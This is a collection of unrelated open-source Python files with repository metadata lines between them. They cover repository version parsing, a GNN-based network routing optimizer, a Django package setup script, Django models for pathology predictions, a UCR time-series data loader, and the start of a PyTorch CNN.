return repounits.UorDoc(name, 'N/A')
UOR_VERSIONS_CACHE = {}
def get_uor_version(uor, uors_map):
"""Try to get the version number of a UOR.
Args:
uor (Package or PackageGroup): The unit of release.
uors_map (dict of str to uor): Map of name to uors in the repo.
Returns:
UorVersion
"""
def _is_valid(version):
return (sysutil.is_int_string(version.major) and
sysutil.is_int_string(version.minor) and
sysutil.is_int_string(version.patch))
global UOR_VERSIONS_CACHE
if uor.name in UOR_VERSIONS_CACHE:
return UOR_VERSIONS_CACHE[uor.name]
try:
version = _get_uor_version_impl(uor)
if _is_valid(version):
UOR_VERSIONS_CACHE[uor.name] = version
return version
except:
UOR_VERSIONS_CACHE[uor.name] = None
return None
ref_name = version.major.split('_')[0].lower()
if uor.name != ref_name:
if ref_name not in UOR_VERSIONS_CACHE:
ref_version = _get_uor_version_impl(uors_map[ref_name])
ref_version = ref_version if _is_valid(ref_version) else None
UOR_VERSIONS_CACHE[ref_name] = ref_version
version = UOR_VERSIONS_CACHE[ref_name]
else:
version = None
UOR_VERSIONS_CACHE[uor.name] = version
return version
def _get_uor_version_impl(uor):
is_group = getattr(uor, 'components', None) is None
if is_group:
scm_path = os.path.join(uor.path, '%sscm' % uor.name)
versiontag_path = os.path.join(scm_path,
'%sscm_versiontag.h' % uor.name)
if uor.name in ('bde', 'bsl', 'hsl'):
version_path = os.path.join(scm_path,
'%sscm_patchversion.h' % uor.name)
else:
version_path = os.path.join(scm_path,
'%sscm_version.cpp' % uor.name)
else:
versiontag_path = os.path.join(uor.path, '%s_versiontag.h' % uor.name)
version_path = os.path.join(uor.path, '%s_version.cpp' % uor.name)
with open(versiontag_path) as f:
versiontag_source = f.read()
with open(version_path) as f:
version_source = f.read()
major_ver_re = re.compile(
r'''^\s*#define\s+%s_VERSION_MAJOR\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
minor_ver_re = \
re.compile(r'''^\s*#define\s+%s_VERSION_MINOR\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
if uor.name in ('bde', 'bsl'):
patch_ver_re = re.compile(
r'''^\s*#define\s+%sSCM_PATCHVERSION_PATCH\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
else:
patch_ver_re = re.compile(
r'''^\s*#define\s+%s_VERSION_PATCH\s+(\S+)\s*$''' %
uor.name.upper(), re.MULTILINE)
major_ver = None
minor_ver = None
patch_ver = None
m = major_ver_re.search(versiontag_source)
if m:
major_ver = m.group(1)
m = minor_ver_re.search(versiontag_source)
if m:
minor_ver = m.group(1)
m = patch_ver_re.search(version_source)
if m:
patch_ver = m.group(1)
return repounits.UorVersion(major_ver, minor_ver, patch_ver)
# -----------------------------------------------------------------------------
# Copyright 2015 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------- END-OF-FILE -----------------------------------
| 32.233933
| 79
| 0.598134
|
e42da0476c04e07a9fc4695b0b963b02986af08d
| 18,835
|
py
|
Python
|
code/optimizer/optimize_scheduling_routing.py
|
MiquelFerriol/TwinNet
|
6b627cd6e2f6bedd7cdbec790a96b19cd634ff69
|
[
"Apache-2.0"
] | null | null | null |
code/optimizer/optimize_scheduling_routing.py
|
MiquelFerriol/TwinNet
|
6b627cd6e2f6bedd7cdbec790a96b19cd634ff69
|
[
"Apache-2.0"
] | null | null | null |
code/optimizer/optimize_scheduling_routing.py
|
MiquelFerriol/TwinNet
|
6b627cd6e2f6bedd7cdbec790a96b19cd634ff69
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2021 Universitat Politècnica de Catalunya
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
import configparser
import numpy as np
import random
import tensorflow as tf
from statistics import mean
import os
import pickle
import sys
sys.path.insert(1, "../code/GNN/")
from model import model_fn
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
CONFIG = configparser.ConfigParser()
CONFIG._interpolation = configparser.ExtendedInterpolation()
CONFIG.read('../code/GNN/config.ini')
SLA = [0.6, 1]
POLICIES = np.array(['WFQ', 'SP', 'DRR', 'FIFO'])
MAX_NUM_QUEUES = 5
with open('./optimizer/SAMPLE_FIFO_TOS_ROUTING.pkl', 'rb') as f:
sample = pickle.load(f)
def transformation(x, y):
traffic_mean = 661.045
traffic_sdv = 419.19
packets_mean = 0.661
packets_sdv = 0.419
capacity_mean = 25495.603
capacity_sdv = 16228.992
x["traffic"] = (x["traffic"] - traffic_mean) / traffic_sdv
x["packets"] = (x["packets"] - packets_mean) / packets_sdv
x["capacity"] = (x["capacity"] - capacity_mean) / capacity_sdv
y = tf.math.log(y)
return x, y
def sample_to_dependency_graph(sample, intensity, R=None):
G = nx.DiGraph(sample.get_topology_object())
if R is None:
R = sample.get_routing_matrix()
T = sample.get_traffic_matrix()
P = sample.get_performance_matrix()
D_G = nx.DiGraph()
for src in range(G.number_of_nodes()):
for dst in range(G.number_of_nodes()):
if src != dst:
D_G.add_node('p_{}_{}'.format(src, dst),
traffic=(T[src, dst]['Flows'][0]['AvgBw'] / sample.maxAvgLambda) * intensity,
packets=(T[src, dst]['Flows'][0]['PktsGen'] / sample.maxAvgLambda) * intensity,
#traffic=T[src, dst]['Flows'][0]['AvgBw'],
#packets=T[src, dst]['Flows'][0]['PktsGen'],
tos=int(T[src, dst]['Flows'][0]['ToS']),
source=src,
destination=dst,
delay=float(P[src, dst]['AggInfo']['AvgDelay']))
if G.has_edge(src, dst):
D_G.add_node('l_{}_{}'.format(src, dst),
capacity=G.edges[src, dst]['bandwidth'],
policy=np.where(G.nodes[src]['schedulingPolicy'] == POLICIES)[0][0])
for h_1, h_2 in [R[src, dst][i:i + 2] for i in range(0, len(R[src, dst]) - 1)]:
D_G.add_edge('p_{}_{}'.format(src, dst), 'l_{}_{}'.format(h_1, h_2))
q_s = str(G.nodes[h_1]['queueSizes']).split(',')
# policy = G.nodes[h_1]['schedulingPolicy']
if 'schedulingWeights' in G.nodes[h_1]:
q_w = str(G.nodes[h_1]['schedulingWeights']).split(',')
else:
q_w = ['-']
if 'tosToQoSqueue' in G.nodes[h_1]:
map = [m.split(',') for m in str(G.nodes[h_1]['tosToQoSqueue']).split(';')]
else:
map = [[1], [2], [3]]
q_n = 0
for q in range(G.nodes[h_1]['levelsQoS']):
D_G.add_node('q_{}_{}_{}'.format(h_1, h_2, q),
size=int(q_s[q]),
priority=q_n,
weight=float(q_w[q]) if q_w[0] != '-' else 0)
D_G.add_edge('l_{}_{}'.format(h_1, h_2), 'q_{}_{}_{}'.format(h_1, h_2, q))
if str(int(T[src, dst]['Flows'][0]['ToS'])) in map[q]:
D_G.add_edge('p_{}_{}'.format(src, dst), 'q_{}_{}_{}'.format(h_1, h_2, q))
D_G.add_edge('q_{}_{}_{}'.format(h_1, h_2, q), 'p_{}_{}'.format(src, dst))
q_n += 1
D_G.remove_nodes_from([node for node, out_degree in D_G.out_degree() if out_degree == 0])
n_q = 0
n_p = 0
n_l = 0
mapping = {}
for entity in list(D_G.nodes()):
if entity.startswith('q'):
mapping[entity] = ('q_{}'.format(n_q))
n_q += 1
elif entity.startswith('p'):
mapping[entity] = ('p_{}'.format(n_p))
n_p += 1
elif entity.startswith('l'):
mapping[entity] = ('l_{}'.format(n_l))
n_l += 1
D_G = nx.relabel_nodes(D_G, mapping)
return D_G, n_q, n_p, n_l
def generator(sample, intenisty, comb_routing, comb_scheduling):
it = 0
for routing in comb_routing:
D_G, n_q, n_p, n_l = sample_to_dependency_graph(sample, intenisty, routing)
link_to_path = np.array([], dtype='int32')
queue_to_path = np.array([], dtype='int32')
l_p_s = np.array([], dtype='int32')
l_q_p = np.array([], dtype='int32')
path_ids = np.array([], dtype='int32')
for i in range(n_p):
l_s_l = 0
q_s_l = 0
for elem in D_G['p_{}'.format(i)]:
if elem.startswith('l_'):
link_to_path = np.append(link_to_path, int(elem.replace('l_', '')))
l_s_l += 1
elif elem.startswith('q_'):
queue_to_path = np.append(queue_to_path, int(elem.replace('q_', '')))
q_s_l += 1
path_ids = np.append(path_ids, [i] * q_s_l)
l_p_s = np.append(l_p_s, range(l_s_l))
l_q_p = np.append(l_q_p, range(q_s_l))
path_to_queue = np.array([], dtype='int32')
sequence_queues = np.array([], dtype='int32')
for i in range(n_q):
seq_len = 0
for elem in D_G['q_{}'.format(i)]:
path_to_queue = np.append(path_to_queue, int(elem.replace('p_', '')))
seq_len += 1
sequence_queues = np.append(sequence_queues, [i] * seq_len)
queue_to_link = np.array([], dtype='int32')
sequence_links = np.array([], dtype='int32')
l_q_l = np.array([], dtype='int32')
for i in range(n_l):
seq_len = 0
for elem in D_G['l_{}'.format(i)]:
queue_to_link = np.append(queue_to_link, int(elem.replace('q_', '')))
seq_len += 1
sequence_links = np.append(sequence_links, [i] * seq_len)
l_q_l = np.append(l_q_l, range(seq_len))
if -1 in list(nx.get_node_attributes(D_G, 'delay').values()):
continue
if it % 500 == 0:
print("GENERATED SAMPLE: {}".format(it))
it += 1
yield {"traffic": list(nx.get_node_attributes(D_G, 'traffic').values()),
"packets": list(nx.get_node_attributes(D_G, 'packets').values()),
"capacity": list(nx.get_node_attributes(D_G, 'capacity').values()),
"size": list(nx.get_node_attributes(D_G, 'size').values()),
"policy": list(nx.get_node_attributes(D_G, 'policy').values()),
"priority": list(nx.get_node_attributes(D_G, 'priority').values()),
"weight": list(nx.get_node_attributes(D_G, 'weight').values()),
"link_to_path": link_to_path,
"queue_to_path": queue_to_path,
"path_to_queue": path_to_queue,
"queue_to_link": queue_to_link,
"sequence_queues": sequence_queues,
"sequence_links": sequence_links,
"path_ids": path_ids,
"l_p_s": l_p_s,
"l_q_p": l_q_p,
"l_q_l": l_q_l,
"n_queues": n_q,
"n_links": n_l,
"n_paths": n_p,
}, list(nx.get_node_attributes(D_G, 'delay').values())
def input_fn(sample, intenisty, comb_routing, comb_scheduling, transform=True, repeat=True, take=None):
ds = tf.data.Dataset.from_generator(
lambda: generator(sample=sample, intenisty=intenisty, comb_routing=comb_routing,
comb_scheduling=comb_scheduling),
({"traffic": tf.float32, "packets": tf.float32,
"capacity": tf.float32,
"size": tf.float32, "policy": tf.int32,
"priority": tf.int32,
"weight": tf.float32, "link_to_path": tf.int32,
"queue_to_path": tf.int32, "path_to_queue": tf.int32,
"queue_to_link": tf.int32, "sequence_queues": tf.int32,
"sequence_links": tf.int32, "path_ids": tf.int32,
"l_p_s": tf.int32, "l_q_p": tf.int32,
"l_q_l": tf.int32,
"n_queues": tf.int32, "n_links": tf.int32,
"n_paths": tf.int32},
tf.float32),
({"traffic": tf.TensorShape([None]), "packets": tf.TensorShape([None]),
"capacity": tf.TensorShape([None]),
"size": tf.TensorShape([None]), "policy": tf.TensorShape([None]),
"priority": tf.TensorShape([None]),
"weight": tf.TensorShape([None]), "link_to_path": tf.TensorShape([None]),
"queue_to_path": tf.TensorShape([None]), "path_to_queue": tf.TensorShape([None]),
"queue_to_link": tf.TensorShape([None]), "sequence_queues": tf.TensorShape([None]),
"sequence_links": tf.TensorShape([None]), "path_ids": tf.TensorShape([None]),
"l_p_s": tf.TensorShape([None]), "l_q_p": tf.TensorShape([None]),
"l_q_l": tf.TensorShape([None]),
"n_queues": tf.TensorShape([]), "n_links": tf.TensorShape([]),
"n_paths": tf.TensorShape([])},
tf.TensorShape([None])))
if transform:
ds = ds.map(lambda x, y: transformation(x, y))
if repeat:
ds = ds.repeat()
if take:
ds = ds.take(take)
ds = ds.prefetch(tf.data.experimental.AUTOTUNE)
return ds
def evaluate_solution(D_G, pred_delays):
sat_tos = [[] for _ in range(int(CONFIG['DATASET']['num_tos']))]
no_sat_tos = [[] for _ in range(int(CONFIG['DATASET']['num_tos']))]
best_effort = []
delays = [[] for _ in range(int(CONFIG['DATASET']['num_tos']))]
id = 0
for node, data in D_G.nodes(data=True):
if node.startswith('p_'):
if data['tos'] < len(sat_tos) - 1:
# D_G.nodes[node]['predicted_delay'] = delays[id]
if pred_delays[id] <= SLA[data['tos']]:
# D_G.nodes[node]['sla'] = True
sat_tos[data['tos']].append(node)
else:
# D_G.nodes[node]['sla'] = False
no_sat_tos[data['tos']].append(node)
delays[data['tos']].append(pred_delays[id])
else:
delays[2].append(pred_delays[id])
best_effort.append(node)
id += 1
for it in range(len(best_effort)):
if mean(delays[2]) < delays[2][it]:
no_sat_tos[2].append(best_effort[it])
else:
sat_tos[2].append(best_effort[it])
return sat_tos, no_sat_tos, delays
def compute_mean(a):
means = []
for elem in a:
means.append(mean(elem))
return mean(means)
def k_shortest_paths(G, source, target, k, weight=None):
paths = []
leng = -1
for path in nx.shortest_simple_paths(G, source, target, weight=weight):
if leng == -1:
leng = len(path)
if len(path) == leng or len(path) <= leng + k:
paths.append(path)
elif len(path) > leng + k:
return paths
return paths
MODEL_DIR = './logs/all_queues'
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=MODEL_DIR,
params=CONFIG
)
NO_SOL_IT = 3
COMB_PER_ITERATION = 1000
MAX_SAMPLES = 5000
df_to_concat = []
# list(range(1900, 900, -100))
for intensity in list(range(1800, 900, -100)):
with open('./optimizer/SAMPLE_WFQ_TOS_ROUTING.pkl', 'rb') as f:
sample = pickle.load(f)
with open('./optimizer/scheduling/scheduling_{}.pkl'.format(intensity), 'rb') as f:
G = pickle.load(f)
with open('./optimizer/routing/routing_{}.pkl'.format(intensity), 'rb') as f:
R = pickle.load(f)
sample._set_routing_matrix(R)
sample._set_topology_object(G)
K = 1
G = nx.DiGraph(sample.get_topology_object())
R = sample.get_routing_matrix()
routing = np.copy(R)
P = np.zeros((len(G), len(G)), dtype='object')
D_G, n_q, n_p, n_l = sample_to_dependency_graph(sample, intensity)
comb_routing = [routing]
pred_results = estimator.predict(input_fn=lambda: input_fn(
sample,
intensity,
comb_routing,
None,
transform=True,
repeat=False))
pred_delay = np.exp([pred['predictions'] for pred in pred_results])
"""print(sample.maxAvgLambda)
print(mean(np.abs(list(nx.get_node_attributes(D_G, 'delay').values()) - pred_delay) / list(
nx.get_node_attributes(D_G, 'delay').values())))"""
len(pred_delay)
len(list(nx.get_node_attributes(D_G, 'delay').values()))
sat_tos, no_sat_tos, delays = evaluate_solution(D_G, pred_delay)
ini_sat_tos = sat_tos.copy()
ini_no_sat_tos = no_sat_tos.copy()
ini_delays = delays.copy()
len(ini_no_sat_tos[0])
len(ini_no_sat_tos[1])
print("INITIAL SOLUTION")
print("SATISFIED SLA 0: {}".format(len(ini_sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(ini_sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(ini_delays[2])))
max_delay = compute_mean(delays)
worst_routing = None
for src in G.nodes():
for dst in G.nodes():
P[src][dst] = k_shortest_paths(G, src, dst, K)
it = 0
it_no_sol = 0
while True:
if it_no_sol == NO_SOL_IT:
break
print("ITERATION {}".format(it))
print("{} NOT SATISFYING SLA 0: {}".format(len(no_sat_tos[0]), no_sat_tos[0]))
print("{} NOT SATISFYING SLA 1: {}".format(len(no_sat_tos[1]), no_sat_tos[1]))
comb_routing = []
change = None
if len(no_sat_tos[0]) != 0:
print("ITERATING OVER TOS = 0")
reward = no_sat_tos[0] + random.sample(no_sat_tos[1], int(len(no_sat_tos[1]) / 5))
penalize = random.sample(sat_tos[0], int(len(sat_tos[0]) / 5)) + random.sample(sat_tos[1], int(
len(sat_tos[1]) / 5)) + random.sample(sat_tos[2],
int(len(sat_tos[1]) / 10))
elif len(no_sat_tos[1]) != 0:
print("ITERATING OVER TOS = 1")
reward = no_sat_tos[1]
penalize = random.sample(sat_tos[2], int(len(sat_tos[1]) / 5))
else:
print("ITERATING OVER BEST EFFORT")
reward = no_sat_tos[2]
penalize = sat_tos[0] + sat_tos[1]
if it_no_sol >= 2:
print("NO SOLUTION FOUND DURING {} ITERATIONS. STARTING PENALIZING...".format(it_no_sol))
for _ in range(COMB_PER_ITERATION):
R_aux = np.copy(routing)
for path in reward:
src = D_G.nodes[path]['source']
dst = D_G.nodes[path]['destination']
# print("CHANGING SRC: {} DST: {}".format(src,dst))
R_aux[src, dst] = random.choice(P[src, dst])
if it_no_sol >= 2:
for path in penalize:
src = D_G.nodes[path]['source']
dst = D_G.nodes[path]['destination']
# print("CHANGING SRC: {} DST: {}".format(src,dst))
R_aux[src, dst] = random.choice(P[src, dst])
comb_routing.append(R_aux)
pred_results = estimator.predict(input_fn=lambda: input_fn(
sample,
intensity,
comb_routing,
None,
transform=True,
repeat=False))
pred_delay = np.exp([pred['predictions'] for pred in pred_results])
splited_delay = np.array_split(pred_delay, COMB_PER_ITERATION)
it_no_sol += 1
for i in range(len(splited_delay)):
s_sat_tos, s_no_sat_tos, s_delays = evaluate_solution(D_G, splited_delay[i])
if len(s_no_sat_tos[0]) < len(no_sat_tos[0]):
print("FOUND BETTER SOLUTION 1: BEFORE {} AFTER {}".format(len(sat_tos[0]), len(s_sat_tos[0])))
sat_tos = s_sat_tos
no_sat_tos = s_no_sat_tos
delays = s_delays
routing = np.copy(comb_routing[i])
it_no_sol = 0
elif (len(s_no_sat_tos[0]) == len(no_sat_tos[0])) and (len(s_no_sat_tos[1]) < len(no_sat_tos[1])):
print("FOUND BETTER SOLUTION 2: BEFORE {} AFTER {}".format(len(sat_tos[1]), len(s_sat_tos[1])))
sat_tos = s_sat_tos
no_sat_tos = s_no_sat_tos
delays = s_delays
routing = np.copy(comb_routing[i])
it_no_sol = 0
elif (len(s_no_sat_tos[0]) == len(no_sat_tos[0])) and (len(s_no_sat_tos[1]) == len(no_sat_tos[1])) and (
mean(s_delays[2]) < mean(delays[2])):
print("FOUND BETTER SOLUTION 3: BEFORE {} AFTER {}".format(mean(delays[2]), mean(s_delays[2])))
sat_tos = s_sat_tos
no_sat_tos = s_no_sat_tos
delays = s_delays
routing = np.copy(comb_routing[i])
it_no_sol = 0
print("CURRENT SOLUTION")
print("SATISFIED SLA 0: {}".format(len(sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(delays[2])))
it += 1
print("INITIAL SOLUTION FOUND")
print("SATISFIED SLA 0: {}".format(len(ini_sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(ini_sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(ini_delays[2])))
print("BEST SOLUTION FOUND FOR INTENSITY {}".format(intensity))
print("SATISFIED SLA 0: {}".format(len(sat_tos[0])))
print("SATISFIED SLA 1: {}".format(len(sat_tos[1])))
print("MEAN DELAY BEST EFFORT: {}".format(mean(delays[2])))
with open('./optimizer/scheduling_routing/routing_{}.pkl'.format(intensity), 'wb') as f:
pickle.dump(routing, f, pickle.HIGHEST_PROTOCOL)
with open('./optimizer/scheduling_routing/delays_{}.pkl'.format(intensity), 'wb') as f:
pickle.dump(delays, f, pickle.HIGHEST_PROTOCOL)
| 40.074468
| 116
| 0.554765
|
744ee3be090d9ec1b30307fcb2162d1792b1a5af
| 1,857
|
py
|
Python
|
setup.py
|
SocioDroid/django-excel-response
|
8aef53162b79b0b951eca73f642f5d6d0f29507c
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
SocioDroid/django-excel-response
|
8aef53162b79b0b951eca73f642f5d6d0f29507c
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
SocioDroid/django-excel-response
|
8aef53162b79b0b951eca73f642f5d6d0f29507c
|
[
"Apache-2.0"
] | null | null | null |
import os
from setuptools import setup
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
with open('README.rst', 'r') as f:
README = f.read()
with open('VERSION', 'r') as vfile:
VERSION = vfile.read().strip()
setup(
name='django-excel-response',
version=VERSION,
author='Joey Wilhelm',
author_email='tarkatronic@gmail.com',
license='Apache',
description='Django package to easily render Excel spreadsheets',
long_description=README,
packages=['excel_response'],
include_package_data=True,
url='https://github.com/tarkatronic/django-excel-response',
download_url='https://github.com/tarkatronic/django-excel-response/archive/master.tar.gz',
install_requires=[
'openpyxl>=2.6.1'
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Framework :: Django :: 1.10',
'Framework :: Django :: 1.11',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Office/Business :: Financial :: Spreadsheet',
],
zip_safe=False,
test_suite='runtests.runtests'
)
| 33.160714
| 94
| 0.620894
|
1ba5a40dbb20f7fa60a549ebb5de775851386fb9
| 2,505
|
py
|
Python
|
promort/predictions_manager/models.py
|
lucalianas/ProMort
|
63702e1b573025e1f956f7d7a0e829f655e728f9
|
[
"MIT"
] | 3
|
2016-12-28T08:12:51.000Z
|
2020-07-08T21:03:48.000Z
|
promort/predictions_manager/models.py
|
lucalianas/ProMort
|
63702e1b573025e1f956f7d7a0e829f655e728f9
|
[
"MIT"
] | 37
|
2016-11-11T09:57:45.000Z
|
2022-03-31T16:04:53.000Z
|
promort/predictions_manager/models.py
|
lucalianas/ProMort
|
63702e1b573025e1f956f7d7a0e829f655e728f9
|
[
"MIT"
] | 4
|
2016-04-22T07:49:40.000Z
|
2021-09-22T08:09:44.000Z
|
# Copyright (c) 2021, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from django.db import models
from django.utils import timezone
from slides_manager.models import Slide
class Prediction(models.Model):
PREDICTION_TYPES = (
('TISSUE', 'Tissue recognition'),
('TUMOR', 'Tumor detection'),
('GLEASON', 'Gleason patterns detection')
)
label = models.CharField(max_length=100, unique=True)
creation_date = models.DateTimeField(auto_now_add=True)
slide = models.ForeignKey(Slide, on_delete=models.PROTECT, blank=False,
related_name='predictions')
type = models.CharField(max_length=7, choices=PREDICTION_TYPES, blank=False, null=False)
omero_id = models.IntegerField(blank=True, null=True, default=None)
provenance = models.TextField(blank=True, null=True)
class TissueFragmentsCollection(models.Model):
prediction = models.ForeignKey(Prediction, on_delete=models.PROTECT, blank=False,
related_name='tissue_fragments')
creation_date = models.DateTimeField(auto_now_add=True)
def get_slide(self):
return self.prediction.slide
class TissueFragment(models.Model):
collection = models.ForeignKey(TissueFragmentsCollection, on_delete=models.PROTECT, blank=False,
related_name='fragments')
shape_json = models.TextField(blank=False)
creation_date = models.DateTimeField(auto_now_add=True)
| 44.732143
| 100
| 0.730539
|
48fa5839e2f2609fe9da1d82791684963b0917ce
| 5,222
|
py
|
Python
|
helper/UCR_loader.py
|
akryeem/dtan
|
b8251c3d08f36a0a75083cdb00e21aef27e6e44b
|
[
"MIT"
] | null | null | null |
helper/UCR_loader.py
|
akryeem/dtan
|
b8251c3d08f36a0a75083cdb00e21aef27e6e44b
|
[
"MIT"
] | null | null | null |
helper/UCR_loader.py
|
akryeem/dtan
|
b8251c3d08f36a0a75083cdb00e21aef27e6e44b
|
[
"MIT"
] | null | null | null |
"""
Created on Oct 2019
author: ronsha
"""
# local
from helper.util import get_dataset_info
import torch
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from tslearn.datasets import UCR_UEA_datasets
import numpy as np
import os
def load_txt_file(datadir, dataset):
'''
Loads UCR text format - useful when working with the data provided by the UCR archivce site.
returns numpy array [N_samples,Width,Channels]
'''
fdir = os.path.join(datadir, dataset)
assert os.path.isdir(fdir), f"{fdir}. {dataset} could not be found in {datadir}"
# again, for file names
f_name = os.path.join(fdir, dataset)
data_train = np.loadtxt(f_name+'_TRAIN',delimiter=',')
data_test_val = np.loadtxt(f_name+'_TEST',delimiter=',')
# get data
X_train = data_train[:,1:]
X_test = data_test_val[:,1:]
# get labels (numerical, not one-hot encoded)
y_train = data_train[:,0]
y_test = data_test_val[:,0]
return X_train, X_test, y_train, y_test
def np_to_dataloader(X, y, batch_size=32, shuffle=True):
X_tensor = torch.Tensor(X)
y_tensor = torch.Tensor(y)
y_tensor = y_tensor.long()
dataset = TensorDataset(X_tensor, y_tensor)
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=2)
return dataloader
def get_train_and_validation_loaders(dataloader, validation_split=0.1, batch_size=32, shuffle=True, rand_seed=42):
'''
Inspired by:https://stackoverflow.com/a/50544887
Args:
dataloader (torch DataLoader): dataloader torch type
validation_split (float): size of validation set out of the original train set. Default is 0.1
batch_size (int): batch size. Default is 32.
shuffle (bool): default if True.
rand_seed (int): random seed for shuffling. default is 42
Returns:
train_loader, validation_loader
'''
# Creating data indices for training and validation splits:
dataset_size = len(dataloader.dataset)
indices = list(range(dataset_size))
split = int(np.floor(validation_split * dataset_size))
if shuffle:
np.random.seed(rand_seed)
np.random.shuffle(indices)
train_indices, val_indices = indices[split:], indices[:split]
# Creating PT data samplers and loaders:
train_sampler = SubsetRandomSampler(train_indices)
valid_sampler = SubsetRandomSampler(val_indices)
train_loader = torch.utils.data.DataLoader(dataloader.dataset, batch_size=batch_size,
sampler=train_sampler)
validation_loader = torch.utils.data.DataLoader(dataloader.dataset, batch_size=batch_size,
sampler=valid_sampler)
return train_loader, validation_loader
def processed_UCR_data(X_train, X_test, y_train, y_test):
'''
process tslearn UCR datasets for pytorch.
Fixes negative labels and make sure labels are not 1-hot.
Adds channel dim when necessary
Args:
X_train, X_test, y_train, y_test: numpy arrays
X: [N_samples, Width, Channels]
y: [N_samples]
Returns:
numpy array - X_train, X_test, y_train, y_test
'''
# add a third channel for univariate data
if len(X_train.shape) < 3:
X_train = np.expand_dims(X_train, -1)
X_test = np.expand_dims(X_test, -1)
# Fix labels (some UCR datasets have negative labels)
class_names = np.unique(y_train, axis=0)
y_train_tmp = np.zeros(len(y_train))
y_test_tmp = np.zeros(len(y_test))
for i, class_name in enumerate(class_names):
y_train_tmp[y_train == class_name] = i
y_test_tmp[y_test == class_name] = i
# Fixed
y_train = y_train_tmp
y_test = y_test_tmp
# Switch channel dim ()
# Torch data format is [N, C, W] W=timesteps
X_train = np.swapaxes(X_train, 2, 1)
X_test = np.swapaxes(X_test, 2, 1)
return X_train, X_test, y_train, y_test
def get_UCR_data(dataset_name, datadir=0, batch_size=32):
'''
Args:
dataset_name (str): name of the dataset under parent dir 'datadir'
datadir (str): location of data files
batch_size (int): batchsize for torch dataloaders
Returns:
'''
if (datadir):
X_train, X_test, y_train, y_test = load_txt_file(datadir, dataset_name)
else:
X_train, y_train, X_test, y_test = UCR_UEA_datasets().load_dataset(dataset_name)
X_train, X_test, y_train, y_test = processed_UCR_data(X_train, X_test, y_train, y_test)
input_shape, n_classes = get_dataset_info(dataset_name, X_train, X_test, y_train, y_test, print_info=True)
train_dataloader = np_to_dataloader(X_train, y_train, batch_size, shuffle=True)
train_dataloader, validation_dataloader = get_train_and_validation_loaders(train_dataloader,
validation_split=0.1,
batch_size=batch_size)
test_dataloader = np_to_dataloader(X_test, y_test, batch_size, shuffle=True)
return train_dataloader, validation_dataloader, test_dataloader
| 34.813333
| 114
| 0.67388
|
3f6b68c29a82962b94c40d4ccfb6f64ddec3ac08
| 1,173
|
py
|
Python
|
src/model.py
|
ameya-parab/digit-recognizer
|
3b1f75f702155a7c5556f521244a29209094498e
|
[
"MIT"
] | null | null | null |
src/model.py
|
ameya-parab/digit-recognizer
|
3b1f75f702155a7c5556f521244a29209094498e
|
[
"MIT"
] | null | null | null |
src/model.py
|
ameya-parab/digit-recognizer
|
3b1f75f702155a7c5556f521244a29209094498e
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
class NeuralNetwork(nn.Module):
def __init__(self):
super(NeuralNetwork, self).__init__()
self.conv1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, stride=1)
self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1)
self.dropout1 = nn.Dropout2d(p=0.20)
self.dropout2 = nn.Dropout2d(p=0.35)
